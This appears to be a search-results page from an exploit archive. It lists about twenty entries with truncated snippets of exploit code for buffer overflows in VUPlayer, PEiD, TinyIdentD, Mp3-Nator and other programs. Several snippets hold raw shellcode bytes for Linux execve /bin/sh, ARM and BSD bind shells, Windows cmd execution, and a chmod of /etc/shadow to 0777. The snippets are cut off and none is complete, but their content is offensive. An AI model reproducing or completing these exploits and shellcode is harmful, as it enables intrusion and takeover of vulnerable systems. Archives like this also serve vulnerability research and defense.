7261 matches found
VUPlayer 2.49 - .ASX File (HREF) Local Buffer Overflow Exploit (1)
No description provided by source. !/usr/bin/perl intro; does not need a thread method shellcode to run as best as can. seh work great too! win32exec - EXITFUNC=seh CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com my $shellcode =...
Mac OS X <= 10.4.6 (launchd) Local Format String Exploit (ppc)
No description provided by source. !/usr/bin/perl http://www.digitalmunition.com/FailureToLaunch-ppc.pl Code by Kevin Finisterre kflistsatdigitalmunitiondotcom Much appreciation goes to John H for all kindsa random shit like exploiting Veritas and other random things in the past core... where the...
Computer Associates Products Message Engine RPC Server Multiple Buffer Overflow Vulnerabilities (2)
No description provided by source. source: http://www.securityfocus.com/bid/20365/info Multiple Computer Associates products are prone to multiple buffer-overflow vulnerabilities because the applications using an affected library fail to properly bounds-check user-supplied input before copying it...
ARM Bindshell port 0x1337
No description provided by source. / Title: arm-bind-listen Brief: Bind a shell to port 0x1337 on any local address and wait for connections Author: Daniel Godas-Lopez gmail account dgodas / / socdes = socketAFINET, SOCKSTREAM, IPPROTOTCP; / mov %r0, $2 / AFINET / mov %r1, $1 / SOCKSTREAM / mov...
PEiD <= 0.92 Malformed PE File Universal Buffer Overflow Exploit
No description provided by source. !/usr/bin/perl PEiD = 0.92 Buffer Overflow Universal Exploit Exploit by SkD [email protected] ---------------------------------------------- An old vulnerability but no existing exploit for it, so here it is. Of course, I had to make it universal because of...
Linux x86 /bin/sh Null-Free Polymorphic Shellcode - 46 bytes
No description provided by source. include stdio.h include string.h / Aodrulez's /bin/sh Null-Free Polymorphic Shellcode. Shellcode size : 46 bytes. Special Tnx to 'Chema Garcia aka sch3m4' Tested on : Ubuntu 8.04,Hardy Heron. Email : f3arm3d3aratgmail.com Author: Aodrulez. Atul Alex Cherian Blog...
Mp3-Nator 2.0 - Buffer Overflow Exploit (SEH)
No description provided by source. !usr/bin/python Exploit Title: Exploit Buffer Overflow MP3-Nator Date: 10\11\2010 Author: C4SS!0 G0M3S Software Link: http://www.brothersoft.com/d.php?softid=16524&url=http%3A%2F%2Ffiles.brothersoft.com%2Fmp3audio%2Fplayers%2Fmp3nator.zip Version: 2.0 Tested on:...
Ghostscript 8.0.1/8.15 - zseticcspace() Function Buffer Overflow Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/28017/info Ghostscript is prone to a buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied input. Successfully exploiting this issue may allow remote attackers to execute...
TinyIdentD <= 2.2 - Remote Buffer Overflow Exploit
No description provided by source. tinyidentd exploit code by thomas . pollet at gmail . com bug by Maarten Boone usage: python exploit.py target import socket,sys jmp into nop sled payload = '\xeb\x20' ident crap payload += ', 28 : USERID : UNIX : ' nop sled payload +='XXXX' jmp %esi payload +=...
Magneto Net Resource ActiveX 4.0.0.5 - NetFileClose Exploit (Universal)
No description provided by source. html object classid='clsid:61251370-92BF-4A0E-8236-5904AC6FC9F2' id='target' //object script language='vbscript' 'Magneto Software Net Resource ActiveX v4.0.0.5 NetFileClose SEH Exploit Universal 'Author: dookie 'Original PoC by: s4squatch -...
linux/x86 execve("/bin/sh", ["/bin/sh", NULL]) 23 bytes
No description provided by source. / linux-x86-binshv2.c - 23 bytes Copyright c 2006 Gotfault Security [email protected] Linux/x86 execve/bin/sh, /bin/sh, NULL / char shellcode = \x6a\x0b // push $0xb \x58 // pop %eax \x99 // cltd \x52 // push %edx \x68\x2f\x2f\x73\x68 // push $0x68732f2f...
Python <= 2.4.2 realpath() Local Stack Overflow Exploit
No description provided by source. !/usr/bin/python gexp-python.py Python = 2.4.2 realpath Local Stack Overflow ----------------------------------------------- Against VA Space Randomization. Copyright c 2006 Gotfault Security Bug found and developed by: dx/vaxen Gotfault Security, posidron Tripb...
MoreAmp (.maf) local Stack Buffer Overflow (SEH) (calc)
No description provided by source. Exploit Title : MoreAmp .maf local Stack Buffer Overflow SEH tested on windows xp SP 3 FR Author: MadjiX Special Greets:His0k4 where are you : Greets:Bibi-info , Silectovic , Volc4n0 my $file= MadjiX.maf; my $junk = \x41 x 108 ; my $nseh = \xeb\x06\x90\x90 ; my...
GTA SA-MP server.cfg - Local Buffer Overflow Vulnerability
No description provided by source. GTA SA-MP server.cfg Local Buffer Overflow Vulnerability 0day Date: 9-26-11 Author: SilentDream Software Link: http://team.sa-mp.com/files/samp03csvrR2-2win32.zip Tested on: XP SP3, Windows 7 Thanks to: corelanc0d3r & team, Metasploit, Exploit-db. No PPRs found...
WINMOD 1.4 - (.lst) Local Stack Overflow Exploit
No description provided by source. !/usr/bin/perl Winmod 1.4 .lst Local Stack Overflow Exploit Exploit by CWH Underground Tested on Win XP SP2 EN Download: http://www.software112.com/products/winmod+download.html print \n==================================================\n; print Winmod 1.4 .lst...
win32/xp sp3 (Ru) WinExec+ExitProcess cmd shellcode 12 bytes
No description provided by source. 68 9D 61 F9 77 push 0x77C01345 B8 C7 93 C1 77 mov eax,msvcrt.system FF D0 call eax In msvcrt.dll at 0x77C01344 We have string .cmd, that's the trick. Code will work in WinXP SP3 Pro Rus, in other versions you'd better search the string and systemchar address for...
Mandrake 7/8/9,RedHat 6.x/7 Bonobo EFSTool Commandline Argument Buffer Overflow (3)
No description provided by source. source: http://www.securityfocus.com/bid/5125/info Bonobo is a set of tools and CORBA interfaces included as part of the Gnome infrastructure. It is designed for use on the Linux and Unix operating systems. A boundry condition error has been discovered in the...
Jordan Windows Telnet Server 1.0/1.2 Username Stack Based Buffer Overrun Vulnerability (1)
No description provided by source. source: http://www.securityfocus.com/bid/9316/info Jordan Windows Telnet Server has been reported prone to a remote buffer overrun vulnerability. The issue has been reported to present itself when a username of excessive length is supplied to the Telnet server...
BSD x86 portbind + fork shellcode (111 bytes)
No description provided by source. / -------------- FreeBSD/x86 - portbind shell + fork 111 bytes-------------------- AUTHOR : Tosh OS : BSDx86 Tested on FreeBSD 8.1 EMAIL : [email protected] / include stdio.h include string.h include arpa/inet.h char shellcode =...
29 bytes chmod("/etc/shadow", 0777) shellcode
No description provided by source. include stdio.h include string.h / by Magnefikko 20.04.2010 [email protected] promhyl.oz.pl Subgroup: PRekambr Name: 29 bytes chmod/etc/shadow, 0777 shellcode Platform: Linux x86 chmod/etc/shadow, 0777; gcc -Wl,-z,execstack filename.c shellcode:...